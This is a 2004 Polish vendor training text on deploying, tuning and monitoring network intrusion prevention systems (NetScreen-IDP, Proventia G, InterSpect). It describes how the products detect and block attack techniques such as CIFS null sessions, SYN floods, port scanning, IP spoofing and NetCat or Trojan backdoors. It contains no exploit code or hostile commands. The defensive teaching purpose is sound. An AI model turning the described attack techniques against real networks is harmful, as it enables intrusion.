19 Pole Match jednoznacznie identyfikuje ruch sieciowy podlegający kontroli. Kto inicjuje komunikację (klient)? Z kim odbywa się komunikacja (serwer)? Czy po zidentyfikowaniu ataki w komunikacji IDP poddaje ją kontroli względem następnych reguł? Definiując reguły IDP w trybie Advanced występuje dodatkowe pole Service, określające protokoły i usługi sieciowe poddawane kontroli. Pole Look For identyfikuje zdarzenia i ataki, które IDP powinien wykrywać CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 19

20 Pole Action określa sposób działania IDP po zidentyfikowaniu zdarzenia. Jaką akcję podejmuje IDP? W jaki sposób powiadamia administratora? Gdzie obowiązuje reguła? System IDP po wykryciu zdarzenia może podejmować różne działania w zależności od trybu w jakim funkcjonuje: none brak reakcji, ignore po wykryciu ataku ruch nie jest sprawdzany względem pozostałych ataków określonych w regule polityki bezpieczeństwa, close client & server zamknięcie sesji i wysłanie pakietu RST do klienta i serwera aplikacji, close client zamknięcie sesji i wysłanie pakietu RST do klienta aplikacji, close server zamknięcie sesji i wysłanie pakietu RST do serwera aplikacji, (tylko w trybie in-line) drop packet zablokowanie pakietu bez wysyłania pakietu RST, drop connection zablokowanie połączenia bez wysyłania pakietu RST. Administrator IDP może być powiadomiony o zdarzeniu w następujący sposób: logging zapis informacji o zdarzeniu w logu, alarm zdarzenie wyświetlane jest na konsoli jako alarm (flaga w Log Viewer), session opis zdarzenia zawiera dodatkowo informacje o liczbie pakietów w sesji, liczbie bajtów oraz czasie jej trwania, SNMP Trap komunikat zwrotny do menadżera SNMP, syslog przesłanie informacji o zdarzeniu do serwera SYSLOG, send przesłanie informacji o zdarzeniu pocztą ( ), run script uruchomienie określonego skryptu lub aplikacji, 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 20

21 log packets logowanie pakietów przed wystąpieniem zdarzenia i/lub po wystąpieniu zdarzenia (np. w celu dokładnego przeanalizowania ruchu sieciowego). Definiując reguły IDP w trybie Advanced występują dwa dodatkowe pola: IP Action akcja podejmowana po wykryciu zdarzenia na kolejnych pakietach w ramach tej komunikacji (np. blokowanie przez określony czas pakietów z adresu IP, z którego wykryto atak), Severity priorytet zdarzenia. Uwaga: Ustawienia IP Action powinny zostać dobrze przemyślane przed ich zastosowaniem. Jest to bardzo mocny mechanizm w rękach administratora, którego zastosowanie należy jednak odpowiednio zaplanować. Umożliwia on blokowanie wszelkich działań intruzów w razie gdy zostało przez IDP wykryte ich niedozwolone zachowanie. Przede wszystkim nie należy stosować IP Action jako reakcję na ataki, które mogą potencjalnie być wykonane z innych adresów IP (np. IP Spoofing, adresy IP w wysyłanych przez intruzów pakietach zostały sfałszowane,) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 21

22 System IDP dokonuje analizy ustalonego ruchu sieciowego, wykonując m.in. badania heurystyczne pod kątem wykrywania interakcyjnych sesji, wskazujących na istnienie na chronionych serwerach aplikacji typu Trojan lub Backdoor. Dla przykładu, wszystkie sesje z serwerem FTP, za wyjątkiem protokołu FTP są analizowane pod kątem istnienia aplikacji Backdoor/Trojan. W razie wykrycia nieupoważnionych prób dostępu do chronionych serwerów zabezpieczenia IDP prezentują intruzom nieprawdziwe informacje na temat dostępnych tam usług systemu informatycznego. Dla przykładu, w razie próby dostępu do usług FTP i WWW kontrolera domeny Windows 2000 intruzi uzyskują tylko pozorny dostęp do serwera, a wszystkie ich działania są monitorowane i rejestrowane CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 22

23 Ochrona serwerów w sieciach chronionych przed atakami DoS (destabilizujące, destrukcyjne) wykorzystującymi technikę SYN Flood. System IDP może po zauważeniu ataku wysłać pakiet RST do serwera TCP (metoda passive), bądź na czas dokładnego rozpoznania ataku zestawić z serwerem tymczasową sesję TCP (metoda relay). System IDP wykrywa podejrzane działania (np. skanowanie portów TCP/UDP) i reaguje na nie zgodnie z ustaleniami polityki bezpieczeństwa. Zdefiniowane reguły polityki bezpieczeństwa i ustawienia IDP są sprawdzane w następującej kolejności:» Traffic Anomalies Rulebase,» SYN-Protector Rulebase,» Network Honeypot,» Main Rulebase,» Backdoor Detection Rulebase,» Sensor Settings Rulebase CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 23

24 Administrator systemu zabezpieczeń NetScreen-IDP ma do dyspozycji narzędzia Enterprise Security Profiler służące do analizy sytuacji w systemie informatycznym oraz jego aktualnego stanu bezpieczeństwa m.in. Network View przedstawia dane o ruchu sieciowym (m.in. które komputery komunikują się z którymi i jakie usługi wykorzystują), Application View przedstawia specyficzne dane nt. aplikacji występujących na serwerach i stacjach PC w sieciach chronionych (m.in. rodzaj i wersje aplikacji), Violation View przestawia naruszenia przyjętej polityki bezpieczeństwa (skonfigurowanej w panelu Violation Objects). Konfiguracja Profiler rozpoczyna się od wskazania jakie obiekty będą śledzone przez określone sensory IDP (Edit > Configure). Zalecane jest aby wcześniej zdefiniować te obiekty za pomocą narzędzi Objects Manager CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 24

25 Następnie należy wskazać w jakim kontekście należy śledzić wskazane obiekty systemu informatycznego. Kontekst identyfikuje komputery, użytkowników oraz aplikacje (np. śledzenie logowania FTP, wprowadzanych identyfikatorów oraz wykonywanych poleceń). Po skonfigurowaniu parametrów Security Profiler należy dokonać jego uruchomienia na określonych sensorach IDP (Edit > Action). Dane rejestrowane przez sensory IDP są składowane lokalnie w bazie LDB. Przed ich analizą administrator powinien dokonać ich agregacji i korelacji na stacji zarządzającej IDP CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 25

26 ISS Proventia G Zarządzania urządzeń ISS Proventia G odbywa się z konsoli SiteProtector. Poniżej przedstawiona została procedura instalacji i konfiguracji SiteProtector. Wymagania systemowe dla SiteProtector: dedykowany komputer zawierający wyłącznie oprogramowanie ISS SiteProtector, stały adres IP procesor - min. 1 GHz Intel Pentium III, RAM -1 GB, rozdzielczość ekranu x768, system operacyjny Windows 2000 Server lub Advanced Server (SP4 lub nowszy), Adobe Acrobat Reader 5.0, Microsoft Internet Explorer 6.0 lub nowszy, Microsoft Internet Information Service 5.0 lub nowszy, Microsoft Data Access Components (MDAC) 2.7 lub nowszy, Sun Java 2 Runtime Environment (J2RE), Standard Edition, v Przed instalacją SiteProtector należy zainstalować SQL Server 2000 lub SQL Server 2000 Desktop Engine (MSDE) w wersji SP3 lub nowszej. Typowa instalacja MSDE odbywa się następująco: C:\sql2ksp3\MSDE>setup SAPWD=<haslo administratora> Następnie instalujemy JRE. Przebieg instalacji SiteProtector odbywa się w następującej kolejności: - uruchamiamy program instalacyjny SiteProtector<wersja>_DeploymentPackage.exe 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 26

27 Wstępna konfiguracja SiteProtector Wstępna konfiguracja SiteProtector odbywa się w następującej kolejności: - uruchamiamy konsolę SiteProtector Start Programs ISS RealSecureSiteProtector Console - logujemy się podając id i hasło do konta, na którym został zainstalowany SiteProtector - wprowadzamy licencje produktów zabezpieczeń Tools Manage Sensor Licenses Manage All Add wskazujemy pliki licencji (np. Realsecure.key) kontynuujemy konfigurację 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 27

28 Konfiguracja parametrów sensorów Konfiguracja parametrów sensorów zabezpieczeń ISS odbywa się w następującej kolejności: - definiujemy komputery, na których znajdują się sensory (zakładka Asset uruchamiamy Add Host) 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 28

29 - rejestrujemy moduły zabezpieczeń (zakłada Asset zaznaczamy host uruchamiamy Automatically Register Software) - wskazujemy Event Collector, który będzie pobierał logi i alarmy z modułu zabezpieczeń - weryfikacja konfiguracji parametrów sensora (zakładka Sensor zaznaczamy sensor RealSecure... Sensor Edit Properties) 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 29

30 Konfiguracji polityki bezpieczeństwa sensora Konfiguracja polityki bezpieczeństwa sensora odbywa się w następującej kolejności: - otwieramy edytor polityki bezpieczeństwa (Sensor Proventia G Apply Policy) - wybieramy wzorzec polityki (Select) - tworzymy nową politykę sensora (Derive New) - dostrajamy politykę (Network Events Attacks), a następnie ją zapisujemy i instalujemy (Apply Policy) Ustalamy odpowiednie reakcje sensora na zdarzenia: DISPLAY alarm na konsoli zarządzania, RSKILL wysłanie pakietów TCP RESET w celu zabicia sesji TCP, LOGDB zapis zdarzenia w logu, LOG EVIDENCE zapis sesji związanej ze zdarzeniem, wiadomość o zdarzeniu, 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 30

31 SNMP wiadomość SNMP Trap o zdarzeniu, OPSEC przesłanie komunikatu do firewalla Check Point w celu zablokowania określonych adresów IP, DROP zablokowanie sesji na sensorze. Aktualizacja bazy sygnatur ataków w SiteProtector może odbywać się automatycznie lub ręcznie na żądania administratora. Producent regularnie dostarcza pakiety aktualizacji Proventia XPU CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 31

32 5. Dostrajanie zabezpieczeń IPS i praktyczna ocena ich skuteczności na wykonywane ataki Check Point InterSpect Jednymi z najczęstszych problemów, z jakimi mają do czynienia administratorzy zabezpieczeń są robaki internetowe rozprzestrzeniające się za pomocą protokołu HTTP (np. CodeRed, Nimda). Robaki przenoszą się pomiędzy serwerami Web wykorzystując ich błędy bezpieczeństwa jak Unicode Bugs, Directory Traversal oraz podatności różnych modułów aplikacyjnych. Strategia ochrony przed tymi zagrożeniami zastosowana w Application Intelligence to identyfikowane robaków poprzez sygnatury w zapytaniach HTTP i ich blokowanie w czasie rzeczywistym. Mechanizm HTTP Worm Catcher umożliwia blokowanie na firewall prób przenoszenia się robaków na inne serwery Web (patrz rysunek). W razie potrzeby administrator może także definiować własne sygnatury robaków CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 32

33 Protokół CIFS (Common Internet File System) jest wykorzystywany do przesyłania zapytań do serwerów sieciowych o dostęp do plików i usług drukowania. CIFS został m.in. zaimplementowany w protokołach NetBIOS (TCP-139) oraz Microsoft-DS (TCP-445). Niewłaściwie skonfigurowane serwery CIFS pozwalają klientom na otwieranie sesji z wykorzystaniem pustego identyfikatora i hasła użytkownika. Intruzi w sposób anonimowy mogą uzyskać dostęp do współdzielonego zasobu IPC$ na komputerach Windows, a następnie odczytać wiele informacji nt. systemu (m.in. listę użytkowników i grup, listę podłączonych komputerów, listę zasobów współdzielonych). Błędy implementacji CIFS umożliwiają także wykonywanie ataków destrukcyjnych i destabilizujących DoS na serwery sieciowe Windows (patrz rysunek). Check Point IS posiada zaimplementowane mechanizmy inspekcji protokołu CIFS. Umożliwiają one szczegółową kontrolę wykorzystania zasobów sieci Windows. Dodatkowo, moduł aplikacyjnej kontroli SmartDefence może blokować połączenia CIFS Null Session. Zapewnia to ochronę przed atakami wykorzystującymi anonimowe połączenia CIFS (np. SMBdie) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 33

34 Z wykorzystaniem narzędzi dostępnym w konsoli SmartDashboard systemu zabezpieczeń Check Point InterSpect dostrajamy globalne ustawienia polityki bezpieczeństwa CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 34

35 Juniper NetScreen-IDP System Network IPS występuje zwykle jako system uzupełniający i ubezpieczający firewall. Wdrożenie skutecznego systemu ochrony przed atakami z sieci wymaga uwzględnienia wielu aspektów i włączenia odpowiednich mechanizmów zabezpieczeń, m.in.: 1. Utrudnianie skanowania i rozpoznawania systemów. 2. Wykrywanie skanowania i prób penetracji. 3. Ochrona przed atakami exploit. 4. Wykrywanie i blokowanie połączeń z backdoor. 5. Ochrona przed atakami destrukcyjnymi i destabilizującymi (D)DoS. 6. Definiowanie nowych ataków i zdarzeń. 7. Blokowanie pakietów z niewłaściwą adresacją (Anti-Spoofing). 8. Ochrona serwisów dostępnych na niestandardowych portach. 9. Ustalenie zasad kontroli dostępu w sieci CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 35

36 Utrudnianie skanowania i rozpoznawania systemów Przed wykonaniem ataków intruzi zwykle dokonują rozpoznania obiektów ataku tak, aby dobrać odpowiednie narzędzia. Włączenie mechanizmu Network Honeypot ma na celu przekazywanie intruzom nieprawdziwych informacji nt. dostępnych usług systemu (zwykle przedstawianie usług specyficznych dla innej klasy systemów). Skanowanie portów wraz z techniką TCP/IP fingerprint pozwala intruzowi na ustalenie dostępnych usług sieciowych oraz rodzaju systemu operacyjnego serwera. W przypadku zastosowania zabezpieczeń NetScreen-IDP (Network Honeypot) intruz otrzymuje wiele nieprawdziwych informacji utrudniających prowadzenie dalszego ataku (np. na serwerze MS Windows zostają rozpoznane usługi specyficzne dla serwerów Unix) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 36

37 Wykrywanie skanowania i prób penetracji Włączenie w polityce bezpieczeństwa kategorii ataków Network Scanner Identification ma na celu wykrywanie skanowania i prób penetracji. System zabezpieczeń identyfikuje podstawowe techniki skanowania oraz rozpoznawania systemów operacyjnych i aplikacji, a także techniki specyficzne dla określonych narzędzi (np. Nessus, NMAP). Dostępny w NetScreen-IDP mechanizm wykrywania anomalii ruchu sieciowego Traffic Anomalies odpowiada za identyfikowanie różnych technik skanowania i identyfikacji systemów, m.in.: TCP/UDP Scan - skanowanie wykrywane, gdy z jednego adresu IP w określonym czasie wykonywana jest określona liczba prób połączenia do różnych portów TCP/UDP chronionego systemu, Distributed Scan - skanowanie wykrywane, gdy z wielu adresów IP jednocześnie wykonywane jest skanowanie portów TCP/UDP chronionego systemu, ICMP Sweep skanowanie wykrywane, gdy z jednego adresu IP wysyłane są zapytania ICMP Ping do wielu adresów w sieci w celu ustalenia ich dostępności, a także Network Scan skanowanie wykrywane, gdy z jednego adresu IP wykonywane jest skanowanie portów TCP/UDP wielu chronionych systemów CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 37

38 Ochrona przed atakami exploit W polityce bezpieczeństwa NetScreen-IDP włączamy kategorie ataków exploit specyficzne dla chronionych zasobów systemu informatycznego. Dla przykładu, w przypadku chronionego serwera Microsoft Internet Information Server włączamy kategorie ataków istotne dla tego systemu (m.in. kategorie Microsoft IIS o priorytecie Critical, High i Medium). Prze obecnej liczbie sygnatur ataków, na jakiej operują systemy IDS/IPS (ponad 2,000) polityka bezpieczeństwa odgrywa bardzo istotną rolę. W systemie zabezpieczeń NetScreen- IDP jest ona oparta na jasno sprecyzowanych logicznych regułach, wynikających z realizowanych zadań ochrony wskazanych zasobów systemu informatycznego. W rozwiązaniach IPS opartych na starej generacji systemach IDS konfiguracja zabezpieczeń polega głównie na przeglądaniu bazy ataków i włączaniu/wyłączaniu sygnatur bez możliwości wskazania jakiej komunikacji dotyczą. Przez to systemy te wykonują analizę ruchu sieciowego w sposób nielogiczny (np. komunikacja do serwera DNS sprawdzana jest pod kątem ataków HTTP), a w konsekwencji wykrywają i rejestrują zdarzenia nieistotne z punktu widzenia bezpieczeństwa sieci chronionej (m.in. fałszywe alarmy). Pewnym złagodzeniem skutków braku precyzyjnej polityki bezpieczeństwa może być korelowanie rejestrowanych przez IPS logów z wynikami skanera, za pomocą którego ustala się jakie aplikacje występują na chronionych serwerach. W praktycznym działaniu jest to jednak mało pomocne, ponieważ skaner nie jest w stanie ustalić rodzaju wielu aplikacji. Serwery sieciowe ze względów bezpieczeństwa ukrywają swoją tożsamość (np. serwer pocztowy Qmail przedstawia się w sieci jako MS Exchange) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 38

39 Dodatkowo, przez dostępne w systemie NetScreen-IDP grupy Dynamic Group administrator zabezpieczeń może definiować i używać w polityce bezpieczeństwa grupy ataków przypisane do określonych systemów operacyjnych i aplikacji. Sygnatury w grupie dynamicznej mogą zostać związane z określonymi protokołami, rodzajem i poziomem zagrożenia ataków, itp.. W momencie aktualizacji bazy sygnatur nowe ataki są automatycznie dodawane do określonych reguł i grup polityki bezpieczeństwa. Administrator zabezpieczeń może na wiele sposób zostać powiadomiony o zdarzeniu (m.in. alarm na konsolę, komunikat SNMP, wiadomość i Syslog, uruchomienie programu/skryptu, zarejestrowanie określonej liczby pakietów przed i po zdarzeniu w celu ich późniejszej analizy). Konsola zabezpieczeń IDP zawiera graficzne narzędzia Packet Viewer umożliwiające przeglądanie zawartości pakietów, w których zidentyfikowane zostały ataki. Oprócz narzędzi dostępnych w konsoli IDP zarejestrowany ruch może być także przeglądany i analizowany za pomocą innych dostępnych narzędzi (np. Ethereal) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 39

40 Administratorzy systemu IDP mogą za pomocą graficznego edytora Signature Editor definiować własne sygnatury ataków i innych zdarzeń (np. klauzule tajności w wysyłanych wiadomościach ). System zabezpieczeń IDP posiada otwarty format sygnatur (ang. open signature format). Sygnatury ataków definiowane są z wykorzystaniem powszechnie stosowanej notacji wyrażeń regularnych (ang. regular expressions). Poniżej przedstawiony został przykład sygnatury zdefiniowanej przez administratora IDP. Przykład dotyczy wykrywania niedozwolonych znaków w wartościach parametrach (URL GET) wprowadzanych do aplikacji Web (sygnatura: (= [a-z] [0-9] [A-Z])+ Negate) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 40

41 Wykrywanie i blokowanie połączeń z backdoor W razie przeprowadzenia udanego włamania do systemu i zainstalowania backdoor intruz bez wykonywania ataków może uzyskiwać do niego nieupoważniony dostęp. W systemie zabezpieczeń NetScreen-IDP występują dwie metody przeciwdziałania takim sytuacjom. Włączenie mechanizmu Protocol Anomaly Detection oraz sygnatur Backdoor dla chronionych zasobów systemu informatycznego (tzn. w regułach polityki bezpieczeństwa dodajemy odpowiednie kategorie Protocol Anomaly oraz Backdoor) powoduje, że ruch sieciowy sprawdzany jest pod kątem zgodności z obowiązującymi standardami dla poszczególnych protokołów. Dodatkowo należy skonfigurować mechanizm Backdoor Detection, który poprzez analizę heurystyczną wykrywa specyficzną dla backdoor interakcyjną komunikację. Dla przykładu, dzięki niemu połączenie do backdoor (NetCat na porcie 25-TCP) zostaje po krótkim czasie zablokowane przez zabezpieczenia NetScreen-IDP CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 41

42 Ochrona przed atakami destrukcyjnymi i destabilizującymi (D)DoS Podstawowa ochrona przed atakami (D)DoS realizowana jest przez mechanizm SYN- Protector. Należy włączyć go dla serwerów narażonych na ataki typu SYN-Flooding. Dodatkowo w polityce bezpieczeństwa włączamy ataki (D)DoS specyficzne dla chronionych zasobów systemu informatycznego. W razie wykrycia ataku na strategiczne zasoby systemu informatycznego NetScreen- IDP może na określony czas całkowicie zablokować dostęp dla adresów IP, z których zostały wykonane ataki. Ustawienia te powinny jednak zostać dobrze przemyślane przed ich zastosowaniem. Jest to bardzo mocny mechanizm w rękach administratora, którego zastosowanie należy odpowiednio zaplanować. Przede wszystkim nie należy stosować tego mechanizmu jako reakcji na ataki, które mogą potencjalnie być wykonane z innych adresów IP (np. ataki wykorzystujące IP Spoofing do fałszowania adresów, z których są wysyłane). Oprócz włączenia odpowiednich mechanizmów ochrony przed atakami należy także zwrócić uwagę na właściwe dostrojenie konfiguracji zabezpieczeń NetScreen-IDP tak, aby uwzględniała ona specyficzne uwarunkowania systemu informatycznego, m.in.: zdefiniowanie nowych ataków i zdarzeń (np. blokowanie specyficznych dla danego kraju aplikacji P2P), ochronę serwisów na niestandardowych portach (tzn. zdefiniowane nowych serwisów i dodanie ich do odpowiednich reguł polityki bezpieczeństwa), blokowanie pakietów z niewłaściwą adresacją (m.in. włączenie mechanizmu Spoofing Detection w celu blokowania napływających z Internetu pakietów zawierających adres źródłowy IP należący do sieci wewnętrznych), ustalenie zasad kontroli dostępu w sieci (np. blokowanie niedozwolonych połączeń z DMZ do sieci wewnętrznej; system NetScreen-IDP może w tym przypadku pełnić rolę firewall) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 42

43 ISS Proventia G Dostrajanie zabezpieczeń ISS Proventia G odbywa się w edytorze polityki bezpieczeństwa, gdzie określone sygnatury ataków można wyłączyć/włączyć oraz ustalić dla nich indywidualny zestaw reakcji. Do pozostałych elementów dostrajania konfiguracji zabezpieczeń Proventia G można zaliczyć: 1. Ustawienie reakcji na określone sesje sieciowe (np. blokowanie sesji FTP). 2. Zdefiniowanie nowych zdarzeń (np. na konto administratora) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 43

44 3. Ustalenie komunikacji ignorowanej przez sensory. 4. Ustalenie ataków ignorowanych przez sensory CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 44

45 5. Konfiguracja filtru pakietów (listy ACL) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 45

46 6. Zarządzanie bezpieczeństwem systemach Network IPS Check Point InterSpect W systemie zabezpieczeń Check Point InterSpect analiza rejestrowanych zdarzeń odbywa się za pomocą narzędzi SmartView Tracker. Generowanie raportów i statystyk z logów InterSpect odbywa się za pomocą SmartView Reporter CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 46

47 W wykorzystaniem narzędzi SmartView Monitor administrator systemu zabezpieczeń Check Point InterSpect analizuje występujące naruszenia bezpieczeństwa CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 47

48 ISS Provetia G Monitorowanie bezpieczeństwa w SiteProtector odbywa się za pomocą wyświetlanej w czasie rzeczywistym listy Security Alerts, gdzie przedstawiane alarmy mogą być poddawane analizie. Dodatkowy moduł Fusion Module umożliwia korelację zdarzeń rejestrowanych przez systemy IDS/IPS z wynikami skanera Internet Scanner CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 48

49 Raporty generowane z logów historycznych składowanych w bazie Microsoft SQL umożliwiają poddawanie analizie danych skorelowanych. Konsola SiteProtector zawiera listę predefiniowanych raportów. Własne raporty mogą być dodawane za pomocą oprogramowania Cristal Reports CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 49

50 Juniper NetScreen-IDP Monitorowanie stanu bezpieczeństwa Graficzna konsola Dashboard wyświetla w czasie rzeczywistym wybrane statystyki z funkcjonowania sieci i zabezpieczeń (m.in. najczęściej wykonywane ataki, najczęstsze źródła ataków, najczęstsze cele ataków, status elementów systemu zabezpieczeń). Czas odświeżania danych na ekranie ustala się w konfiguracji Edit Set Refresh Interval CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 50

51 Analiza rejestrowanych zdarzeń Administrator NetScreen-IDP na bieżąco dokonuje analizy bezpieczeństwa systemu informatycznego z użyciem dedykowanych narzędzi. Za pomocą Log Viewer przegląda zdarzenia zarejestrowane przez poszczególne sensory IDP. W czasie rzeczywistym wyświetlane są rekordy logów w formacie tabeli z możliwością definiowania specyficznych reguł filtracji oraz selekcji danych. Zdarzenia mogą być także przeglądane za pomocą polecenia logviewer. Zdarzenia zarejestrowane w logu IDP mogą zostać zapisane do innego formatu (m.in. pliku PDF, Postscript, XML, CSV) lub wyeksportowane do bazy SQL, serwera Syslog, menadżera SNMP, bądź przesłane na wskazane konto serwera SMTP. Odbywa się to z konsoli GUI oraz polecenia log2action CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 51

52 Administrator IDP przeglądając zarejestrowane zdarzenia za pomocą Log Viewer może szybko dowiedzieć się, jaki jest dokładny opis zdarzenia (definicja sygnatury ataku), na podstawie której reguły i polityki został stworzony wpis oraz jak dokładnie przebiegała sesja, w której dokonano ataku CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 52

53 Wykrywanie i wyjaśnianie naruszeń bezpieczeństwa Dane odczytywane z wielu sensorów IDP są za pomocą Log Investigator poddawane w czasie rzeczywistym korelacji i analizie. Administrator zabezpieczeń bez konieczności generowania raportu z logów historycznych może dowiedzieć się kto wykonywał ataki na określone zasoby w sieciach chronionych, ile takich zdarzeń wystąpiło w określonym czasie oraz jakie ataki i błędy bezpieczeństwa zostały przez intruzów wykorzystane. Za pomocą Log Investigator administrator zabezpieczeń na jednym ekranie przegląda interakcyjną tabelę z zestawieniem listy intruzów i zaatakowanych przez nich systemów (oś Y i X). W polach tabeli Log Investigator znajduje się liczba wykrytych ataków. Dane zawarte w tabeli odnoszą się do wskazanego przez administratora okresu czasu (np. ostatnie 2 godziny). Prawym przyciskiem myszki administrator odczytuje z tabeli jakie dokładnie ataki zostały wykonane przez intruza, jakie usługi były atakowane, w jakim czasie zostały wykonane ataki oraz inne dane z tym związane (np. reakcja systemu zabezpieczeń) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 53

54 Przeglądane w Log Viewer zdarzenia mogą zostać za pomocą Quick Report poddane korelacji w czasie rzeczywistym w odniesieniu do innych, związanych z nimi zdarzeń (np. w czasu ostatnich 12 godzin). W celu dokładniejszego wyjaśnienia zdarzeń administrator może przeanalizować sesje związane z zarejestrowanymi atakami (np. 20 pakietów przed i 10 pakietów po ataku). W systemie zabezpieczeń IDP dostępne są do tego celu odpowiednie narzędzia (Packet Viewer). Administrator może to także zrobić z wykorzystaniem innych posiadanych narzędzi (np. Ethereal) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 54

55 Konsola GUI za pomocą narzędzi Report Manager prezentuje tworzone w czasie rzeczywistym zestawienia i statystyki. Administratorzy mają do dyspozycji ponad 20 predefiniowanych raportów. W razie potrzeby mogą definiować dowolne własne raporty CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 55

56 Wykrywanie sytuacji przełamania zabezpieczeń System zabezpieczeń Juniper NetScreen-IDP w zakresie zarządzania bezpieczeństwem posiada unikalny mechanizm Enterprise Security Profiler. Umożliwia on administratorom wykrywanie sytuacji, kiedy zabezpieczenia systemu informatycznego zostały przełamane (np. atak został wykonany od wewnątrz, intruz wykorzystał do ataku zero day exploit ). Zakres praktycznych zastosowań tego mechanizmu jest b. duży, m.in.: 1. Security Profiler na bieżąco zbiera i automatycznie aktualizuje informacje na temat występujących w sieciach chronionych komputerów oraz zainstalowanych na nich aplikacjach. System zabezpieczeń IDP podnosi alarm w razie zauważenia nowych komputerów bądò aplikacji w sieciach chronionych. Dodatkowo administrator zabezpieczeń za pomocą dedykowanych graficznych narzędzi może sprawdzić jakie zmiany wystąpiły w sieci w określonym okresie czasu (m.in. nowe komputery, nowe aplikacje i otwarte porty). Dzięki temu może wykryć podłączony do sieci wewnętrznej komputer intruza, bądò zainstalowane aplikacje Backdoor/Trojan. 2. Administrator zabezpieczeń IDP za pomocą Security Profiler może bez konieczności skanowania sieci dowiedzieć się jakie wersje aplikacji serwerów i stacji roboczych znajdują się w sieciach chronionych. Na tej podstawie może wykonać analizę podatności systemu informatycznego na znane błędy bezpieczeństwa oraz w razie zauważenia ataku zweryfikować, czy atakowany system jest na to zagrożenie podatny. Sensory IDP analizują komunikację sieciową, odczytują z niej i zapamiętują informacje specyficzne dla użytkowników, komputerów i aplikacji, które mogą być przydatne w procesie zarządzania bezpieczeństwem (m.in. adresy MAC i IP, nazwy NetBIOS, rodzaje kart sieciowych, rodzaje i wersje klientów i serwerów aplikacji, polecenia wydawane aplikacji, itd.). Wykorzystując Security Profiler administrator zabezpieczeń może szybko ustalić jakie zmiany wystąpiły w sieci w określonym czasie (m.in. zidentyfikować nowe aplikacje i otwarte porty, nowe komputery) i dzięki temu wykryć zainstalowane aplikacje Trojan i nielegalnie podłączone do sieci wewnętrznej komputery intruzów, a nawet pracowników łamiących zasady użytkowania systemu informatycznego. Na poniższych rysunkach został przedstawiany efekt połączenia z Trojanem Luzak, jaki został zarejestrowany przez IDP Security Profiler CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 56

57 Powiadomienie administratorów o wykryciu nowego otwartego portu na serwerze Wykrywanie aplikacji Trojan na podstawie analizy zmian w sieci chronionej 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 57

58 Inną dostępną w systemie zabezpieczeń Juniper NetScreen-IDP metodą wykrywania połączeń z Trojanami jest analiza heurystyczna komunikacji sieciowej. W systemie IDP oprócz detekcji Trojanów poprzez sygnatury i analizę zmian w sieci (Security Profiler) został zaimplementowany do tego celu dedykowany mechanizm Backdoor Detection. Jego działanie polega na wykrywaniu sesji interakcyjnych, typowych dla połączeń z aplikacją Trojan. Metoda ta jest skuteczna w sytuacji, gdy intruz nawiązuje połączenie z zainstalowanym wcześniej Trojanem i komunikacja ta jest monitorowana przez zabezpieczenia IDP. Taka sytuacja może wystąpić gdy Trojan został zainstalowany w sieci wewnętrznej przez użytkownika (umyślnie lub nieświadomie), bądź na skutek ataku exploit, który nastąpił z wykorzystaniem nie opublikowanego błędu bezpieczeństwa lub od wewnątrz sieci z pominięciem zabezpieczeń IPS. Działanie mechanizmu Backdoor Detection jest skuteczne dla większości dostępnych w Internecie aplikacji exploit. Aplikacje te uruchamiają na atakowanym serwerze ñshellcode, poprzez który intruz uzyskuje dostęp do konsoli zarządzania systemu operacyjnego. Zwykle połączenie z serwerem nie jest szyfrowane. Dopiero poprzez to połączenie intruz może skopiować i zainstalować na serwerze dedykowaną, zwykle trudną do wykrycia aplikację Trojan (np. Setiri). System zabezpieczeń IDP po kilku sekundach pracy intruza z Trojanem blokuje sesję i wyświetla alarm o wykryciu na serwerze nielegalnej aplikacji (patrz rysunek). Wykrycie połączenia z Trojanem poprzez analizę heurystyczną komunikacji sieciowej 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 58